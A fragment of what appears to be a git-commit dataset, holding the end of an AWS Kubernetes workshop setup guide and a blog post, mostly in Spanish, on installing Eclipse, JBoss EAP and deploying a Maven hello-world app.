image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Oregon* (us-west-2)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Ireland* (eu-west-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=eu-west-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Singapore* (ap-southeast-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=ap-southeast-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n|===\n\nTo open Cloud9 IDE environment, click on Output tab in CloudFormation Console and open Cloud9 URL\n\nhttps:\/\/console.aws.amazon.com\/cloud9\/ide\/<EnvironmentId>\n\nanchor:next[]\n\n== Build Script\n\nOnce your Cloud9 is ready, download the build script and install in your IDE. This will prepare your IDE for running tutorials in this workshop. The build script will install the following:\n\n- jq\n- kubectl\n- kops\n- configures AWS CLI and stores variables in bash_profile (for ex: AWS_AVAILABILITY_ZONES, KOPS_STATE_STORE etc)\n- creates an SSH key\n- clone the workshop repository into Cloud9\n\nTo install the script, run this command - again in the Terminal tab of the Cloud9 IDE:\n\n $ aws s3 cp s3:\/\/aws-kubernetes-artifacts\/lab-ide-build.sh . 
&& chmod +x lab-ide-build.sh && .\/lab-ide-build.sh\n\nOne last step is required so that the Cloud9 IDE uses the assigned IAM instance profile. Open the \"AWS Cloud9\" menu, go to \"Preferences\", go to \"AWS Settings\", and disable \"AWS managed temporary credentials\" as depicted in the diagram here:\n\nimage:cloud9-disable-temp-credentials.png[]\n\nimage:next-step-arrow.png[ , title=\"Continue!\"] \nYou are now ready to continue on with the workshop!\n\nThe next step is link:..\/102-your-first-cluster[to create a Kubernetes cluster using kops].\n\n== Workshop Cleanup\n\nOnce you have finished with the workshop, please don't forget to spin down your cluster or you will incur additional charges.\n(We will also remind you at the end!)\n\n==== Delete Kubernetes cluster resources\n\nIn your Cloud9 IDE, check whether any Kubernetes clusters are running\n\n kops get cluster\n\nDelete the Kubernetes cluster\n\n kops delete cluster example.cluster.k8s.local --yes\n\nWait until all resources are deleted by kops\n\n==== Delete Cloud9 Environment\n\nGo to the CloudFormation console, right-click the template with the name 'k8s-workshop' and select 'Delete Stack'\n\nThis should delete all the resources associated with this workshop\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e009cd63b28bf0cb6cd1e15be277d449f9a27cb6","subject":"Update 2015-04-15-Montar-un-entorno-de-trabajo-adecuado-22.adoc","message":"Update 2015-04-15-Montar-un-entorno-de-trabajo-adecuado-22.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Montar-un-entorno-de-trabajo-adecuado-22.adoc","new_file":"_posts\/2015-04-15-Montar-un-entorno-de-trabajo-adecuado-22.adoc","new_contents":"= Setting up a proper working environment (2\/2)\nLa metaweb\n:hp-tags: Eclipse, JBoss, JBoss Tools\n:published_at: 2015-04-15\n\nIn this second post we will finish installing and configuring the software that will let us build our own Java EE applications from now on. As our IDE we choose Eclipse, as it is the most widely used. Jumping from one IDE to another is not costly, neither in learning time nor in the time needed to adapt the project, if we manage our projects with Maven or Gradle.\n\nAn IDE should give the developer an environment that makes them as productive as possible, hiding the complexity of the technologies used behind the source code generated to carry out the tasks in the project's design documents. One example is creating a web service: here the IDE generates all the necessary classes and files for us, and we only have to focus on defining the API and implementing each operation.\n\nIn my experience NetBeans is a good environment, with many helpers, and mature in version 8; it also has a large community and Oracle behind it. On the downside, while developing a medium-sized project on version 8.0, it would occasionally sit there \"thinking\" for a few seconds. Then there is JDeveloper, Oracle's official IDE, very powerful and a recommendable option for large new projects, and if we develop against Oracle and\/or the WebLogic server. For Spring projects there is Eclipse STS, which offers powerful wizards. If our server is JBoss or the new WildFly we can opt for the solution adopted here, Eclipse + JBoss Tools, or go directly for JBoss Developer Studio. The advantage of choosing Eclipse is that we can customize our environment by installing the plugins we choose. In short, we have multiple options, and the decision will often depend on the technologies we choose, or on those the type of project or the client itself imposes on us.\n
\nOK, first of all we are going to create a simple folder structure in which to save our work as we go, and where we will install the software. For example the following:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig009.png[]\n\nUnder the `TALLER` folder we create the following:\n\n* `BD`: For the databases we install along the way: MySQL, Derby, etc.\n* `IDE`: For the Eclipse IDE installation. Install others if you want to take a look at them.\n* `Servidor`: Our JBoss EAP Community edition will go here. Although if in the future we look at something specific to Java EE 7 we will install WildFly or GlassFish.\n* `Workspace`: To store the projects developed in Eclipse.\n\nThe compressed file is simply a quick way of backing up the workspace.\n\nTo install Eclipse (again, I advise you to do it in English) we go to the page https:\/\/www.eclipse.org\/downloads\/ and choose the installation for Java EE developers.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig010.png[]\n\nWe download the `.zip` file, copy it into the `c:\\\\TALLER\\\\IDE\\\\` folder and select Extract here; there is no installer program. We enter the Eclipse folder and double-click `eclipse.exe`. We select the `c:\\\\TALLER\\\\workspace\\\\` folder as the workspace. The IDE loads and we close the initial welcome screen by clicking the icon in the top right-hand corner.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig015.png[]\n\nNOTE: Do not tick the `Use this as the default and do not ask again` checkbox, so that you can change the workspace in the future if you want to. If you do tick it, you can bring back the workspace selection screen by configuring it under `Window > Preferences > General > Startup and Shutdown > Workspaces`.\n\nNow it is the server's turn. Our working environment needs a full server in order to debug the code we are developing. We navigate to the official JBoss server page at http:\/\/www.redhat.com\/en\/technologies\/jboss-middleware\/application-platform and click the `TRY IT NOW` button inside the `TRY` tab, which is selected by default.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig020.png[]\n\nThis takes us to the JBoss server page for developers.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig022.png[]\n\nWe choose our operating system and click the installer link. If we are not already logged in, we will jump to the user name and password page. We create an account by clicking the `Create Account` link.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n
Procedemos a la creaci\u00f3n de una cuenta pulsando el enlace `Create Account`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n\nDespu\u00e9s de introducir una serie de datos b\u00e1sicos aceptamos los t\u00e9rminos del Programa de Desarrollador de Jboss. Esperamos a que la bajada del fichero acabe. Copiamos el fichero en la carpeta `C:\\TALLER\\Servidor\\` y lo arrancamos escribiendo el comando `java -jar jboss-eap-6.3.0-installer.jar`.\n\nSe iniciar\u00e1 un sencillo wizard de instalaci\u00f3n. Si os aparece un mensaje acerca del Firewall de Windows elegid la opci\u00f3n `Permitir`. A la hora de elegir la carpeta de instalaci\u00f3n seleccionad como antes, `C:\\TALLER\\Servidor\\`. Escribimos luego un nombre de usuario y una contrase\u00f1a. Estas credenciales son las del usuario administrador del servidor, que lo gestionar\u00e1 a trav\u00e9s del navegador usando la Consola de Administraci\u00f3n. Apuntad en un sitio seguro estos datos para no olvidarlos. En la instalaci\u00f3n de este servidor se eligieron las credenciales:\n\n[cols=\"1h,2\", width=\"40\"]\n|===\n|user\n|admin\n\n|password\n|abcd-1234\n|===\n\nEs interesante instalar tambi\u00e9n los ejemplos que trae el servidor. Son varios proyectos Maven que muestran ejemplos sencillos sobre el uso de las diferentes tecnolog\u00edas Java EE incidiendo en las gestionadas desde Red Hat: JPA (Hibernate), CDI (Weld), EJB, JSF, etc. Si abrimos el `pom.xml` de alguno de estos proyectos veremos como se definen de las dependencias en proyectos que se despliegan en el servidor JBoss.\n\nEl wizard contin\u00faa por una serie de pantallas donde dejamos las opciones por defecto, la instalaci\u00f3n finaliza a los pocos segundos. Y ya tenemos instalado un flamante servidor Java EE 6 en local. Podemos finalmente guardar y echar un vistazo al script de instalaci\u00f3n.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig030.png[]\n\nComprobaremos que la instalaci\u00f3n es correcta desplegando la aplicaci\u00f3n web _Hello World!_ localizada en los ejemplos reci\u00e9n instalados. Para arrancar manualmente el servidor abrimos una consola de comandos, vamos a la carpeta `bin\\` dentro de la carpeta del servidor y lo iniciamos escribiendo `standalone.bat`. Es importante no cerrar la ventana de comandos ya que si lo hacemos el proceso en que se ejectuta el servidor se terminar\u00e1 y \u00e9ste se parar\u00e1. As\u00ed que dejamos la ventana de comandos abierta, aunque s\u00ed podemos minimizarla.\n\nNOTE: Si antes no instalaste los ejemplos del servidor puedes bajarlos ahora en el enlace https:\/\/github.com\/jboss-developer\/jboss-eap-quickstarts\/archive\/6.3.0.GA.zip[jboss-eap-quickstarts-6.3.0.GA.zip]. Otra alternativa es obtener la aplicaci\u00f3n desde Maven a partir del arquetipo `maven-archetype-site-simple`. Puedes consultar el Post anterior para recordar c\u00f3mo lo hicimos.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig035.png[]\n\nAhora abrimos otra consola de comandos y situamos en la carpeta del proyecto web helloworld `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig040.png[]\n\nDentro de la carpeta del proyecto Maven escribimos el comando `mvn clean install jboss-as:deploy`. 
Se inicia la bajada de los artefactos de dependencias y plugins necesarios y finalmente el comando se ejecuta. Con una sola l\u00ednea de comando hemos llevado a cabo todo el ciclo de construcci\u00f3n del proyecto incluyendo el despliegue de la aplicaci\u00f3n en nuestro reci\u00e9n instalado servidor. A\u00fan con un proyecto tan simple podemos apreciar aqu\u00ed la potencia de Maven. S\u00ed observamos el comando vemos que hemos ejecutado dos phases y un goal. La primera fase, `clean`, elimina cualquier fichero creado en un ciclo de construcci\u00f3n anterior, la segunda ejecuta todas las fases de ciclo por defecto, incluida la fase `install`, que crea una versi\u00f3n snapshot en nuestro repositorio local. Finalmente el goal `deploy` del plugin de Red Hat `jboss-as` toma el artefacto instalable de la carpeta `target\\` dentro de la carpeta del proyecto y lo despliega en el servidor.\n\nAbrimos un navegador y vamos a la direcci\u00f3n `http:\/\/localhost:8080\/jboss-helloworld` y si todo ha ido bien veremos el conocido mensaje `Hello World!`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig050.png[]\n\n\u00bfY para desinstalar la aplicaci\u00f3n? Otra \u00fanica linea de comando: `mvn jboss-as:undeploy`. Refrescamos la ventana del navegador para ver el error 404 de recurso no disponible. \n\nEl plugin `jboss-as` es capaz de gestionar desde Maven cualquier operaci\u00f3n contra el servidor JBoss. Para usarlo sobre un proyecto como acabamos de hacer s\u00f3lo es necesario declararlo en la secci\u00f3n `<build>` del fichero `pom.xml`. Otra alternativa es incluir el goal de despliegue en la phase final del ciclo por defecto, la fase install, en el fichero pom.xml, y ejecutar entonces el comando mvn clean install, que ahora s\u00f3lo hace referencia a las dos fases. En el fichero pom.xml tendr\u00edamos que tener lo siguiente:\n\n[source,xml]\n----\n<project>\n ...\n <build>\n ...\n <plugins>\n ...\n <plugin>\n <groupId>org.jboss.as.plugins<\/groupId>\n <artifactId>jboss-as-maven-plugin<\/artifactId>\n <version>7.7.Final<\/version>\n <executions>\n <execution>\n <phase>install<\/phase>\n <goals>\n <goal>deploy<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n ...\n <\/plugins>\n ...\n <\/build>\n...\n<\/project>\n----\n\nParemos el servidor. Como fue arrancado desde una consola de comandos lo paramos cerr\u00e1ndola. Nos vamos a la ventana de la consola y pulsamos `Ctrl + C`. Escribimos `S` si nos pregunta si queremos finalizar el archivo por lotes y escribimos `exit` para cerrar la ventana.\n\nVamos ahora a reemplazar la ventana de comando por nuestro IDE para cargar el proyecto y probarlo. Abrimos Eclipse. Una vez dentro del IDE lo primero que hacemos es asegurarnos de que el JRE que se usar\u00e1 sea el contenido en el JDK instalado y no un JRE p\u00fablico fuera del JDK. Esto es necesario porque Eclipse necesita un JDK, como cualquier herrmienta de desarrollo de este tipo, y no le basta s\u00f3lo con un JRE. 
Me voy a `Windows > Preferences > Java > Installed JREs` y si el JRE no es el incluido en el JDK lo borramos, a\u00f1adimos el incluido en el JDK y lo marcamos como JRE por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig051.png[]\n\nNOTE: Si vamos a experimentar con los ejemplos del servidor en Eclipse es aconsejable comprimir antes la carpeta raiz que los contiene y tener as\u00ed una copia de seguridad que nos permita recuperar el contenido de los ficheros originales cuando lo necesitemos.\n\nEl siguiente paso es importar el proyecto a Eclipse. Me voy a `File > Import > Maven > Existing Maven Projects`. Click en `Next` y luego en `Browse...` localizamos la carpeta del proyecto en `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.En el recuadro `Projects` se seleccionar\u00e1 autom\u00e1ticamente el fichero POM del proyecto. Pulsamos en `Finish` y se nos pregunta si deseamos que nos muestre el cheatsheet que es el conjunto de notas del proyecto, si contestamos afirmativamente luego podemos cerrarlas.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig052.png[]\n\nArrancamos de nuevo el servidor de forma manual desde la ventana de comandos como hicimos antes. Para desplegar el ejemplo importado en el servidor pulsamos bot\u00f3n derecho sobre el proyecto y `Run As\u2026 > Run Configurations > Maven Build`, y creamos una nueva configuraci\u00f3n de arranque rellenando el campo `Goals` con `clean install jboss-as:deploy`. Pulsamos el bot\u00f3n `Apply` y a continuaci\u00f3n el bot\u00f3n `Run` para que Maven realice el ciclo. En la ventana _Consola_ de Eclipse se puede observar la salida de texto del plugin de Maven durante la ejecuci\u00f3n del ciclo de construcci\u00f3n. \n\nComo antes para comprobar que la aplicaci\u00f3n ha sido desplegada de nuevo vamos al navegador y escribimos la URL `http:\/\/localhost:8080\/jboss-helloworld`.\n\nObservemos como se muestra nuestro proyecto dentro de Eclipse. En la perspectiva inicial por defecto mostrada vemos la estructura del proyecto en un recuadro a la izquierda de la pantalla. Aqu\u00ed podemos usar tres views de Eclipse diferentes: Package Explorer, Project Explorer y Navigator. Esta \u00faltima nos presenta la estructura de directorios del proyecto sin m\u00e1s aderezos y en ocasiones es m\u00e1s limpia y clara. En las otras dos Eclipse aporta informaci\u00f3n adicional en forma de iconos y carpetas extra.\n\nSi nos fijamos en la view Package Explorer o en la Proyect Explorer, si no est\u00e1 abierta lo hacemos en `Window > Show Wiew > Other...`, es probable que observemos un icono de Warning sobre el de proyecto. Vayamos ahora a la pesta\u00f1a `Problems` en la parte inferior de la pantalla para ver a que se debe esto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig055.png[]\n\nLo que nos dice Eclipse es que nuestro proyecto est\u00e1 configurado, en el fichero POM de Maven, para el JDK 1.6 y en nuestra m\u00e1quina tenemos uno distinto. Si tenemos actualizado el JDK es probable que se trate de la versi\u00f3n 1.8. Veamos qu\u00e9 significan las dos entradas de la figura anterior:\n\n* `maven.compiler.source`: indica al compilador la versi\u00f3n del lenguaje que debe interpretar al leer nuestro c\u00f3digo fuente. 
Por ejemplo si el valor que fijo para mi proyecto es 1.4 entonces no ser\u00e1 capaz de interpretar una clase gen\u00e9rica, que fue introducida en el JDK 1.5, y obtendremos un error de compilaci\u00f3n si existe alguna. Si por el contrario fijo digamos la versi\u00f3n 1.7 para un c\u00f3digo antiguo, sea de la versi\u00f3n 1.4, entonces tambi\u00e9n puedo obtener un error si por ejemplo en el c\u00f3digo antiguo us\u00e9 la palabra clave _enum_, ya que los enumerados se introducen en la versi\u00f3n 1.5 y en Java 1.7, al ser posterior, saltar\u00eda el error. Esto puede verse en la lista de incompatibilidades de la versi\u00f3n 5.0 de Java respecto de la anterior http:\/\/www.oracle.com\/technetwork\/java\/javase\/compatibility-137462.html[aqu\u00ed].\n\n\n\n","old_contents":"= Montar un entorno de trabajo adecuado (2\/2)\nLa metaweb\n:hp-tags: Eclipse, JBoss, JBoss Tools\n:published_at: 2015-04-15\n\n\n\nEn esta segunda entrada terminaremos de instalar y configurar el software que nos permitir\u00e1 en adelante construir nuestras propias aplicaciones Java EE. Como IDE optamos por Eclipse, por ser el m\u00e1s extendido. El salto de uno a otro IDE no es algo costoso, ni en tiempo de aprendizaje ni en tiempo de adaptaci\u00f3n del proyecto si los gestionamos bajo Maven o Gradle.\n\nUn IDE debe procurar al desarrollador un entorno que le permita ser lo m\u00e1s productivo posible, ocultando la complejidad de las tecnolog\u00edas empleadas tras el c\u00f3digo fuente generado para resolver las tareas de los documentos de dise\u00f1o del proyecto. Un ejemplo lo tenemos cuando creamos un web service, aqu\u00ed el IDE nos generar\u00e1 todas las clases y ficheros necesarios y nosotros s\u00f3lo tendremos que enfocarnos en definir la API e implementar cada operaci\u00f3n.\n\nEn mi experiencia Netbeans es un buen entorno, con muchas ayudas, y maduro en su versi\u00f3n en su versi\u00f3n 8, adem\u00e1s tiene detr\u00e1s a una gran comunidad y a Oracle. Como dato en contra, durante el desarrollo de un proyecto mediano, en la versi\u00f3n 8.0, de cuando en cuando se quedaba \"pensando\" unos segundos. Por otro lado tenemos a JDeveloper, que es el IDE oficial de Oracle, muy potente y una opci\u00f3n recomendable para nuevos proyectos de gran tama\u00f1o, y si desarrollamos contra Oracle, y\/o el servidor Weblogic. Para proyectos Spring est\u00e1 Eclipse STS que ofrece potentes wizards. Si nuestro servidor es JBoss o el nuevo WildFly podemos optar la soluci\u00f3n adoptada aqu\u00ed, Eclipse + JBoss Tools, o directamente por JBoss Developer Studio. La ventaja de optar por Eclipse es que podemos personalizar nuestro entorno instalando los plugins que elijamos. En definitiva tenemos m\u00faltiples opciones y la decisi\u00f3n muchas veces depender\u00e1 de las tecnolog\u00edas que elijamos o nos imponga el tipo de proyecto o el propio cliente.\n\nOk, antes de nada vamos a crear una sencilla estructura de carpetas donde ir guardardo el trabajo, y donde instalar el software. Por ejemplo la siguiente:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig009.png[]\n\nBajo la carpeta `TALLER` creamos las siguientes:\n\n* `BD`: Para las bases de datos que vayamos instalando: MySQL, Derby, etc.\n* `IDE`: Para la instalaci\u00f3n del IDE Eclipse. Instalad otros si quer\u00e9is echarles un vistazo.\n* `Servidor`: Aqu\u00ed ir\u00e1 nuestro JBoss EAP edici\u00f3n Comunity. 
Aunque si en el futuro vemos algo particular de Java EE 7 instalaremos WildFly o GlassFish. \n* `Workspace`: Para guardar los proyectos desarrollados en Eclipse.\n\nEl fichero comprimido es simplemente una forma r\u00e1pida de hacer una copia de seguridad del workspace.\n\nPara instalar Eclipse, os aconsejo de nuevo que lo hag\u00e1is en Ingl\u00e9s, vamos a la p\u00e1gina https:\/\/www.eclipse.org\/downloads\/ y elegimos la instalaci\u00f3n para desarrolladores de Java EE.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig010.png[]\n\nBajamos el fichero `.zip`, lo copiamos en la carpeta `c:\\TALLER\\IDE\\` y seleccionamos Extraer aqu\u00ed, no hay programa de instalaci\u00f3n. Entramos en la carpeta de Eclipse y doble click en `eclipse.exe`. Seleccionamos la carpeta `c:\\TALLER\\workspace\\` como espacio de trabajo. El IDE se carga y cerramos la pantalla inicial de bienvenida pulsando en el icono en la esquina arriba a la derecha.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig015.png[]\n\nNOTE: No marqu\u00e9is el check `Use this as the default and do not ask again` para as\u00ed cambiar el workspace si quer\u00e9is en un futuro. Si lo marc\u00e1is pod\u00e9is volver a ver la pantalla de selecci\u00f3n de la carpeta del workspace configur\u00e1ndolo en `Window > Preferences > General > Startup and Shutdown > Workspaces`.\n\nAhora le toca al servidor. Nuestro entorno de trabajo necesita un servidor completo para depurar el c\u00f3digo que estemos desarrollando. Navegamos a la p\u00e1gina oficial del servidor JBoss en http:\/\/www.redhat.com\/en\/technologies\/jboss-middleware\/application-platform y pulsamos el bot\u00f3n `TRY IT NOW` dentro de la pesta\u00f1a `TRY`, seleccionada por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig020.png[]\n\nEsto nos lleva a la p\u00e1gina del servidor JBoss para desarrolladores.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig022.png[]\n\nElegimos nuestro sistema operativo y pulsamos sobre el enlace del installer. Si no estamos ya logados saltaremos a la p\u00e1gina de introducci\u00f3n de usuario y contrse\u00f1a. Procedemos a la creaci\u00f3n de una cuenta pulsando el enlace `Create Account`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n\nDespu\u00e9s de introducir una serie de datos b\u00e1sicos aceptamos los t\u00e9rminos del Programa de Desarrollador de Jboss. Esperamos a que la bajada del fichero acabe. Copiamos el fichero en la carpeta `C:\\TALLER\\Servidor\\` y lo arrancamos escribiendo el comando `java -jar jboss-eap-6.3.0-installer.jar`.\n\nSe iniciar\u00e1 un sencillo wizard de instalaci\u00f3n. Si os aparece un mensaje acerca del Firewall de Windows elegid la opci\u00f3n `Permitir`. A la hora de elegir la carpeta de instalaci\u00f3n seleccionad como antes, `C:\\TALLER\\Servidor\\`. Escribimos luego un nombre de usuario y una contrase\u00f1a. Estas credenciales son las del usuario administrador del servidor, que lo gestionar\u00e1 a trav\u00e9s del navegador usando la Consola de Administraci\u00f3n. Apuntad en un sitio seguro estos datos para no olvidarlos. 
En la instalaci\u00f3n de este servidor se eligieron las credenciales:\n\n[cols=\"1h,2\", width=\"40\"]\n|===\n|user\n|admin\n\n|password\n|abcd-1234\n|===\n\nEs interesante instalar tambi\u00e9n los ejemplos que trae el servidor. Son varios proyectos Maven que muestran ejemplos sencillos sobre el uso de las diferentes tecnolog\u00edas Java EE incidiendo en las gestionadas desde Red Hat: JPA (Hibernate), CDI (Weld), EJB, JSF, etc. Si abrimos el `pom.xml` de alguno de estos proyectos veremos como se definen de las dependencias en proyectos que se despliegan en el servidor JBoss.\n\nEl wizard contin\u00faa por una serie de pantallas donde dejamos las opciones por defecto, la instalaci\u00f3n finaliza a los pocos segundos. Y ya tenemos instalado un flamante servidor Java EE 6 en local. Podemos finalmente guardar y echar un vistazo al script de instalaci\u00f3n.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig030.png[]\n\nComprobaremos que la instalaci\u00f3n es correcta desplegando la aplicaci\u00f3n web _Hello World!_ localizada en los ejemplos reci\u00e9n instalados. Para arrancar manualmente el servidor abrimos una consola de comandos, vamos a la carpeta `bin\\` dentro de la carpeta del servidor y lo iniciamos escribiendo `standalone.bat`. Es importante no cerrar la ventana de comandos ya que si lo hacemos el proceso en que se ejectuta el servidor se terminar\u00e1 y \u00e9ste se parar\u00e1. As\u00ed que dejamos la ventana de comandos abierta, aunque s\u00ed podemos minimizarla.\n\nNOTE: Si antes no instalaste los ejemplos del servidor puedes bajarlos ahora en el enlace https:\/\/github.com\/jboss-developer\/jboss-eap-quickstarts\/archive\/6.3.0.GA.zip[jboss-eap-quickstarts-6.3.0.GA.zip]. Otra alternativa es obtener la aplicaci\u00f3n desde Maven a partir del arquetipo `maven-archetype-site-simple`. Puedes consultar el Post anterior para recordar c\u00f3mo lo hicimos.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig035.png[]\n\nAhora abrimos otra consola de comandos y situamos en la carpeta del proyecto web helloworld `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig040.png[]\n\nDentro de la carpeta del proyecto Maven escribimos el comando `mvn clean install jboss-as:deploy`. Se inicia la bajada de los artefactos de dependencias y plugins necesarios y finalmente el comando se ejecuta. Con una sola l\u00ednea de comando hemos llevado a cabo todo el ciclo de construcci\u00f3n del proyecto incluyendo el despliegue de la aplicaci\u00f3n en nuestro reci\u00e9n instalado servidor. A\u00fan con un proyecto tan simple podemos apreciar aqu\u00ed la potencia de Maven. S\u00ed observamos el comando vemos que hemos ejecutado dos phases y un goal. La primera fase, `clean`, elimina cualquier fichero creado en un ciclo de construcci\u00f3n anterior, la segunda ejecuta todas las fases de ciclo por defecto, incluida la fase `install`, que crea una versi\u00f3n snapshot en nuestro repositorio local. 
Finalmente el goal `deploy` del plugin de Red Hat `jboss-as` toma el artefacto instalable de la carpeta `target\\` dentro de la carpeta del proyecto y lo despliega en el servidor.\n\nAbrimos un navegador y vamos a la direcci\u00f3n `http:\/\/localhost:8080\/jboss-helloworld` y si todo ha ido bien veremos el conocido mensaje `Hello World!`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig050.png[]\n\n\u00bfY para desinstalar la aplicaci\u00f3n? Otra \u00fanica linea de comando: `mvn jboss-as:undeploy`. Refrescamos la ventana del navegador para ver el error 404 de recurso no disponible. \n\nEl plugin `jboss-as` es capaz de gestionar desde Maven cualquier operaci\u00f3n contra el servidor JBoss. Para usarlo sobre un proyecto como acabamos de hacer s\u00f3lo es necesario declararlo en la secci\u00f3n `<build>` del fichero `pom.xml`. Otra alternativa es incluir el goal de despliegue en la phase final del ciclo por defecto, la fase install, en el fichero pom.xml, y ejecutar entonces el comando mvn clean install, que ahora s\u00f3lo hace referencia a las dos fases. En el fichero pom.xml tendr\u00edamos que tener lo siguiente:\n\n[source,xml]\n----\n<project>\n ...\n <build>\n ...\n <plugins>\n ...\n <plugin>\n <groupId>org.jboss.as.plugins<\/groupId>\n <artifactId>jboss-as-maven-plugin<\/artifactId>\n <version>7.7.Final<\/version>\n <executions>\n <execution>\n <phase>install<\/phase>\n <goals>\n <goal>deploy<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n ...\n <\/plugins>\n ...\n <\/build>\n...\n<\/project>\n----\n\nParemos el servidor. Como fue arrancado desde una consola de comandos lo paramos cerr\u00e1ndola. Nos vamos a la ventana de la consola y pulsamos `Ctrl + C`. Escribimos `S` si nos pregunta si queremos finalizar el archivo por lotes y escribimos `exit` para cerrar la ventana.\n\nVamos ahora a reemplazar la ventana de comando por nuestro IDE para cargar el proyecto y probarlo. Abrimos Eclipse. Una vez dentro del IDE lo primero que hacemos es asegurarnos de que el JRE que se usar\u00e1 sea el contenido en el JDK instalado y no un JRE p\u00fablico fuera del JDK. Esto es necesario porque Eclipse necesita un JDK, como cualquier herrmienta de desarrollo de este tipo, y no le basta s\u00f3lo con un JRE. Me voy a `Windows > Preferences > Java > Installed JREs` y si el JRE no es el incluido en el JDK lo borramos, a\u00f1adimos el incluido en el JDK y lo marcamos como JRE por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig051.png[]\n\nNOTE: Si vamos a experimentar con los ejemplos del servidor en Eclipse es aconsejable comprimir antes la carpeta raiz que los contiene y tener as\u00ed una copia de seguridad que nos permita recuperar el contenido de los ficheros originales cuando lo necesitemos.\n\nEl siguiente paso es importar el proyecto a Eclipse. Me voy a `File > Import > Maven > Existing Maven Projects`. Click en `Next` y luego en `Browse...` localizamos la carpeta del proyecto en `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.En el recuadro `Projects` se seleccionar\u00e1 